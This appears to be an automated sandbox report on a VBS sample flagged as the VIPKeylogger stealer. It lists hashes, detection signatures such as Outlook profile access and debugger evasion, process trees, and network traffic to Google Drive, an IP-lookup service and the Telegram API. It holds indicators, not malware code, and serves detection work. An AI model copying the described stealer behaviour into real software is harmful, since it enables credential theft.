Malware Analysis Report

2024-11-15 07:58

Sample ID 241023-sfclpswela
Target DistribucionesEnelcaJanS.L.PEDIDO456799.vbs
SHA256 a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
Tags
vipkeylogger collection discovery execution keylogger stealer
score
10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237

Threat Level: Known bad

The file DistribucionesEnelcaJanS.L.PEDIDO456799.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery execution keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-23 15:03

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-23 15:03

Reported

2024-10-23 15:06

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 168.6.122.193.in-addr.arpa udp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/4100-0-0x00007FFBD1883000-0x00007FFBD1885000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsmfcryq.gh4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4100-10-0x000002C005BE0000-0x000002C005C02000-memory.dmp

memory/4100-11-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-12-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-15-0x00007FFBD1883000-0x00007FFBD1885000-memory.dmp

memory/4100-16-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-17-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-20-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/1032-21-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

memory/1032-22-0x0000000005BA0000-0x00000000061C8000-memory.dmp

memory/1032-23-0x0000000005930000-0x0000000005952000-memory.dmp

memory/1032-24-0x00000000059D0000-0x0000000005A36000-memory.dmp

memory/1032-25-0x00000000061D0000-0x0000000006236000-memory.dmp

memory/1032-31-0x0000000006240000-0x0000000006594000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA256 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512 e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

memory/1032-37-0x00000000067E0000-0x00000000067FE000-memory.dmp

memory/1032-38-0x0000000006810000-0x000000000685C000-memory.dmp

memory/1032-39-0x0000000008040000-0x00000000086BA000-memory.dmp

memory/1032-40-0x0000000006D50000-0x0000000006D6A000-memory.dmp

memory/1032-41-0x0000000007A60000-0x0000000007AF6000-memory.dmp

memory/1032-42-0x00000000079F0000-0x0000000007A12000-memory.dmp

memory/1032-43-0x0000000008C70000-0x0000000009214000-memory.dmp

C:\Users\Admin\AppData\Roaming\Bindehindens.Stu

MD5 d43327229caac3f1c1c7443675eaa345
SHA1 169d456a6122e6a39603f3017eb16df162aca251
SHA256 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3
SHA512 da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d

memory/1032-45-0x0000000009220000-0x000000000E52E000-memory.dmp

memory/4656-58-0x0000000000800000-0x0000000001A54000-memory.dmp

memory/4656-59-0x0000000000800000-0x0000000001A54000-memory.dmp

memory/4656-60-0x0000000000800000-0x0000000000848000-memory.dmp

memory/4656-61-0x0000000024BC0000-0x0000000024C5C000-memory.dmp

memory/4656-62-0x0000000025840000-0x0000000025A02000-memory.dmp

memory/4656-63-0x0000000025670000-0x00000000256C0000-memory.dmp

memory/4656-65-0x0000000025770000-0x0000000025802000-memory.dmp

memory/4656-66-0x0000000025720000-0x000000002572A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-23 15:03

Reported

2024-10-23 15:06

Platform

win7-20240708-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.73:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 184.25.193.234:80 www.microsoft.com tcp

Files

memory/2700-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2700-5-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-6-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2700-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-8-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2700-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-10-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2700-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-13-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVLL3ESHKXJFXX1D8EA1.temp

MD5 2d065c66d5e9293f616b97f6f99d65a1
SHA1 5e4ad8f229ce0742ec6cba772aacc4d34aab5f9c
SHA256 391782ac7dc0a2347fbe4a0c0c123a2a5763e44d8155125b46e4c59c56c9a68d
SHA512 d96f7e1449e6d7ddb1877d36b1ea60f8a38153798728f7ca2c00e476fb95e4c0a73dda342a0e1cc793ff61f52ab0aea02bcba4d00ac0968e7bc238a4ab7e92f3

C:\Users\Admin\AppData\Roaming\Bindehindens.Stu

MD5 d43327229caac3f1c1c7443675eaa345
SHA1 169d456a6122e6a39603f3017eb16df162aca251
SHA256 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3
SHA512 da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d

memory/2072-19-0x0000000006750000-0x000000000BA5E000-memory.dmp

memory/2276-41-0x0000000000F30000-0x0000000001F92000-memory.dmp

memory/2276-42-0x0000000000F30000-0x0000000001F92000-memory.dmp

memory/2276-43-0x0000000000F30000-0x0000000000F78000-memory.dmp